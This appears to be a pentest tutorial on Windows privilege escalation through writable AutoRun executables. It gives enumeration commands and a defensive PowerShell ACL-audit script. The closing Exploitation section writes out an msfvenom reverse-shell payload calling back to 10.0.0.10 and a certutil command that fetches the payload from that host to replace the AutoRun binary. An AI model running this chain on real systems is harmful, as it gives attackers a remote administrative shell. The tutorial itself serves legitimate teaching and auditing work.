Registry - Exploiting AutoRuns
What is AutoRuns?
Autoruns is a Sysinternals tool that shows all the programs and services that start automatically when Windows boots, when you log in, or when you launch certain apps like Explorer. It covers startup folders, registry keys, browser helpers, and more.
You can hide Microsoft-signed entries to focus on third-party programs, and you can even inspect the auto-start items of other user accounts. It also ships with a command-line version, Autorunsc, which can export results to a CSV file.
Autoruns makes it easy to find and manage everything that runs automatically on your system!
From an attacker's point of view, the precondition we are looking for is that the executable an AutoRun entry points to (or the directory it lives in) is writable by a low-privileged user on the system, because that is what lets us swap the binary for our payload.
Manual Enumeration
First, query the registry for the AutoRun executables:
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
The next step is to verify whether the current user has write access to the .exe file, so that it can be replaced with a malicious one. `icacls` or `accesschk` can be used to identify the permissions of a specific folder or file:
icacls [directory/file]
In the `icacls` output, `(F)` means Full Access.
Or with `accesschk`:
accesschk.exe -accepteula -wuqv [file]
Great, Everyone has Full Access!
Automated Enumeration
You could use WinPEAS or the Sysinternals Autorunsc tool.
An example from WinPEAS output:
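The same check that the manual and automated enumeration above perform, written as a PowerShell audit script. This is an added example for this page, not code from the original post, WinPEAS or Autorunsc: it walks the common Run/RunOnce keys, pulls the executable path out of each value, and flags any target file or containing directory that grants write, modify, delete or full-control rights to broad groups. The key list, the group list and the simple regex used to extract the path are assumptions of this example (an unquoted path containing spaces will be truncated at the first space and silently skipped). Note that a value under HKLM\...\Run is executed in the context of every user who logs on, so what a replaced binary actually gains depends on who logs in next; the fix on the defensive side is to restrict write access on that file and directory to Administrators and SYSTEM.

```powershell
# Added audit example (not from the original post): enumerate AutoRun entries and
# flag targets whose ACL lets broad groups replace the binary.
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
)

# Principals that should never be able to modify an auto-started binary (assumed list).
$broadGroups = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

# Rights that allow replacing or altering the file or its directory entry.
$dangerousRights = [System.Security.AccessControl.FileSystemRights]::Write -bor
                   [System.Security.AccessControl.FileSystemRights]::Modify -bor
                   [System.Security.AccessControl.FileSystemRights]::FullControl -bor
                   [System.Security.AccessControl.FileSystemRights]::WriteData -bor
                   [System.Security.AccessControl.FileSystemRights]::Delete

function Get-AutoRunTarget {
    # Extract the executable path from a Run value such as
    #   "C:\Program Files\App\program.exe" /silent   or   C:\Tools\program.exe -x
    # Unquoted paths with spaces are not handled (assumption of this example).
    param([string]$Command)
    if ($Command -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($Command -match '^\s*(\S+\.exe)') { return $Matches[1] }
    return ($Command -split '\s+')[0]
}

function Test-WeakAcl {
    # Return a description of the first Allow ACE that gives a broad group
    # dangerous rights on $Path, or $null when the ACL looks sane.
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($broadGroups -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $dangerousRights) -ne 0) {
            return "$($ace.IdentityReference.Value) has $($ace.FileSystemRights)"
        }
    }
    return $null
}

foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $props = Get-ItemProperty -Path $key
    # Skip the PS* metadata properties that Get-ItemProperty adds to the object.
    $valueNames = ($props.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' }).Name
    foreach ($name in $valueNames) {
        $target = Get-AutoRunTarget -Command ([string]$props.$name)
        $target = [Environment]::ExpandEnvironmentVariables($target)
        if (-not (Test-Path -LiteralPath $target)) { continue }
        # A writable parent directory is as bad as a writable file: the binary can be renamed and replaced.
        foreach ($p in @($target, (Split-Path -Parent $target))) {
            $finding = Test-WeakAcl -Path $p
            if ($finding) {
                [pscustomobject]@{ Key = $key; Value = $name; Path = $p; Issue = $finding }
            }
        }
    }
}
```

Run it in an elevated or a standard PowerShell session; any row it prints corresponds to the `(F)` for Everyone that the `icacls` / `accesschk` output above shows, and is the entry to fix (or, on a pentest, to report).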
Exploitation
All that is left now is to replace the program.exe executable with a reverse shell and make the system execute it, to gain administrative access to the machine.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.10 LPORT=443 -f exe -o reverse.exe
Download it onto the victim machine:
certutil -urlcache -split -f "http://10.0.0.10/reverse.exe" program.exe
`program.exe` is the file name of the AutoRun executable.
Start the listener, restart the machine, and voilà 🥳.